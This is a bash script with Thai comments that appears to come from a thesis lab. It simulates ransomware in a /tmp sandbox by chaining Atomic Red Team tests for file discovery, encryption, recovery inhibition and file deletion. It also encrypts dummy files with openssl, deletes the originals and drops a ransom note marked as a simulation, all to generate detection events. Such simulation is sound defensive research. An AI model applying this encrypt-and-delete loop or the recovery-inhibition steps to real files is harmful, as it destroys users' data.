#!/usr/bin/env bash
# ransomware.sh - จำลองพฤติกรรม ransomware ด้วย Atomic Red Team
# ATT&CK: T1486 (Data Encrypted for Impact), T1490 (Inhibit Recovery),
#         T1083 (File Discovery), T1070.004 (File Deletion)
#
# ทุกอย่างทำใน /tmp/lab_sandbox เท่านั้น - ไม่แตะไฟล์ระบบจริง
set -uo pipefail
source "$(dirname "$0")/_lib.sh"
banner "ransomware"
setup_sandbox

VICTIM="$SANDBOX/victim_files"
mkdir -p "$VICTIM"

# --- เตรียมไฟล์เหยื่อ (dummy) ---
echo "[ransom] สร้างไฟล์เหยื่อจำลอง"
for i in $(seq 1 40); do
    head -c 4096 /dev/urandom | base64 > "$VICTIM/document_$i.txt"
done

# --- Stage 1: สำรวจไฟล์ (T1083) ---
atomic T1083

# --- Stage 2: staging ข้อมูล (T1074.001) ---
atomic T1074.001

# --- Stage 3: เข้ารหัส (T1486) ---
# ART มีหลาย test - บางตัวเป็น Windows only ให้ระบุเลขที่รองรับ Linux
# ตรวจก่อนด้วย: run_atomic.sh T1486 -ShowDetailsBrief
atomic T1486

# --- Stage 4: เข้ารหัสเองใน sandbox (พฤติกรรมหนาแน่น เก็บ event ได้เยอะ) ---
echo "[ransom] เข้ารหัสไฟล์ใน sandbox"
KEY="labkey$(date +%s)"
for f in "$VICTIM"/*.txt; do
    openssl enc -aes-256-cbc -pbkdf2 -salt -in "$f" -out "$f.locked" -pass pass:"$KEY" 2>/dev/null
    rm -f "$f"      # ลบต้นฉบับ -> FileDelete events
done

# --- Stage 5: ทิ้ง ransom note ---
for d in "$VICTIM"; do
    cat > "$d/READ_ME_RECOVERY.txt" <<'NOTE'
[LAB SIMULATION ONLY - NOT REAL RANSOMWARE]
This file was generated by a thesis experiment.
NOTE
done

# --- Stage 6: ขัดขวางการกู้คืน (T1490) ---
atomic T1490

# --- Stage 7: ลบร่องรอย (T1070.004) ---
atomic T1070.004

done_banner "ransomware"